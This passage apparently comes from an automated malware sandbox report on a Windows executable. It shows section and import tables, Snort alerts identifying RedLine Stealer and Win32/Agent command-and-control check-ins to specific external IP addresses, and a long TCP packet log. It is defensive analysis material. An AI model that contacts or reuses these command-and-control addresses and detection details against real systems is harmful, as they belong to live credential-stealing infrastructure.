/29	0x13e000	0x114cc	0x11600	False	0.4358841052158273	Matlab v4 mat-file (little endian) \232aA, rows 2, columns 17039360	5.952888891724912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/41	0x150000	0x1b2d	0x1c00	False	0.2998046875	data	4.934458145598331	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/55	0x152000	0x6bdd	0x6c00	False	0.4019097222222222	data	5.235076571151023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/67	0x159000	0x38	0x200	False	0.1171875	data	0.6721446845015864	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/80	0x15a000	0x1ea	0x200	False	0.609375	data	4.817520394014974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/91	0x15b000	0x7f05	0x8000	False	0.43756103515625	data	5.357843295867503	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/107	0x163000	0x1028	0x1200	False	0.5264756944444444	data	5.155904228339899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, FormatMessageA, FreeConsole, FreeLibrary, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, LocalFree, MultiByteToWideChar, ReleaseSemaphore, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte

msvcrt.dll

__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _close, _errno, _fdopen, _filelengthi64, _fileno, _fileno, _fstat64, _initterm, _iob, _lseeki64, _onexit, _read, _wfopen, _write, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fprintf, fputc, fputs, fread, free, fsetpos, fwrite, getc, getwc, iswctype, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, putc, putwc, realloc, setlocale, setvbuf, signal, strchr, strcmp, strcoll, strerror, strftime, strlen, strncmp, strxfrm, towlower, towupper, ungetc, ungetwc, vfprintf, wcscoll, wcsftime, wcslen, wcsxfrm

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.345.15.157.13149702364572850027 12/05/22-01:32:10.044951	TCP	2850027	ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init	49702	36457	192.168.2.3	45.15.157.131
192.168.2.3172.66.43.60497084432039616 12/05/22-01:33:12.770679	TCP	2039616	ET TROJAN Win32/Agent.AETZ CnC Checkin	49708	443	192.168.2.3	172.66.43.60
192.168.2.345.15.157.13149703364572850286 12/05/22-01:32:29.291113	TCP	2850286	ETPRO TROJAN Redline Stealer TCP CnC Activity	49703	36457	192.168.2.3	45.15.157.131
192.168.2.345.15.157.13149703364572850027 12/05/22-01:32:16.338135	TCP	2850027	ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init	49703	36457	192.168.2.3	45.15.157.131
45.15.157.131192.168.2.336457497032850353 12/05/22-01:32:17.345961	TCP	2850353	ETPRO MALWARE Redline Stealer TCP CnC - Id1Response	36457	49703	45.15.157.131	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2022 01:32:09.761502028 CET	49702	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:09.791240931 CET	36457	49702	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:09.791585922 CET	49702	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:09.837033033 CET	36457	49702	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:09.837197065 CET	49702	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:10.044950962 CET	49702	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:10.074610949 CET	36457	49702	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:16.307526112 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:16.336843014 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:16.336954117 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:16.338135004 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:16.367330074 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:16.399512053 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:16.453629017 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:17.296749115 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:17.326208115 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:17.345961094 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:17.547458887 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:23.866592884 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:23.897130966 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:23.919061899 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:23.919127941 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:23.919194937 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:23.919254065 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:23.919332027 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:23.919332981 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:25.317379951 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:25.346661091 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:25.367903948 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:25.386622906 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:25.433985949 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:25.483750105 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:25.534327030 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:25.579411983 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:26.932485104 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:26.962078094 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:26.981919050 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:27.032588959 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.140616894 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.187477112 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:27.235794067 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.264405966 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.314451933 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:27.360852003 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.708517075 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.758634090 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:27.771591902 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.819144011 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:27.860807896 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:27.981683969 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.011192083 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.011241913 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.030240059 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.079593897 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.109661102 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.156204939 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.181375980 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.228799105 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.282696962 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.305238962 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.334916115 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.334983110 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.356621981 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.407737970 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.497186899 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.526827097 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.545083046 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.595268965 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.938194036 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.967860937 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.967925072 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.967955112 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.967988014 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968027115 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968050957 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968055010 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968086958 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968127012 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968147039 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968163967 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968163967 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968214035 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968286037 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968372107 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968375921 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968461990 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968491077 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968544960 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.968558073 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.968610048 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.997608900 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997661114 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997694016 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997724056 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997740030 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.997754097 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997786045 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997807026 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.997807026 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.997880936 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.997896910 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.997972012 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.998070955 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998100042 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998143911 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.998182058 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998187065 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.998214006 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998397112 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998425961 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998502016 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998579025 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998609066 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998771906 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998800993 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998811960 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.998877048 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.998877048 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.998935938 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.998964071 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.999001026 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.999053001 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:28.999089956 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:28.999157906 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.027025938 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027077913 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027110100 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027134895 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.027164936 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027400970 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027668953 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027700901 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.027903080 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028064966 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028096914 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028182983 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028413057 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028445959 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028492928 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028585911 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028615952 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028740883 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028861046 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.028892994 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029019117 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029216051 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029300928 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029335022 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029350042 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.029417992 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029503107 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029557943 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.029616117 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029695988 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029777050 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029855967 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.029933929 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030013084 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030179024 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030298948 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030430079 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030457973 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030488014 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030519009 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030597925 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030673981 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030797958 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030896902 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.030985117 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.058796883 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.058844090 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.058900118 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.058942080 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.058975935 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.059202909 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.059248924 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.059261084 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.059390068 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.059561968 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.059643984 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.059813976 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.059954882 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060031891 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060153961 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060231924 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060355902 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060477018 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060688972 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060766935 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.060842991 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.061373949 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.061750889 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.061834097 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.088740110 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.088795900 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.088824987 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.088854074 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.088907957 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089128017 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089281082 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089447021 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089499950 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089606047 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089798927 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089884043 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.089998007 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090082884 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090199947 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090393066 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090601921 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090632915 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090722084 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090795994 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090898991 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.090938091 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091079950 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091152906 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091183901 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091279030 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091397047 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091520071 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091542006 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.091597080 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091665030 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.091793060 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091825008 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091852903 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.091936111 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092061043 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092187881 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092314005 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092395067 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092515945 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092545986 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092672110 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092837095 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092866898 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.092945099 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.093022108 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.093461037 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.093489885 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.093837023 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.093923092 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.121691942 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.121745110 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.121778965 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.121860027 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122021914 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122050047 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122170925 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122195959 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122370005 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122454882 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122703075 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122749090 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122777939 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.122857094 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123095036 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123126030 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123209953 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123291016 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123323917 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123646021 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123809099 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123840094 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.123970985 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124034882 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.124047995 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124078035 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124140978 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.124453068 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124665976 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124744892 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124824047 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.124991894 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.125567913 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.126704931 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.127082109 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.127196074 CET	49703	36457	192.168.2.3	45.15.157.131
Dec 5, 2022 01:32:29.153466940 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.153522015 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.153551102 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.153579950 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.153681040 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.153894901 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.153980017 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.154098034 CET	36457	49703	45.15.157.131	192.168.2.3
Dec 5, 2022 01:32:29.154181004 CET	36457	49703	45.15.157.131	192.168.2.3
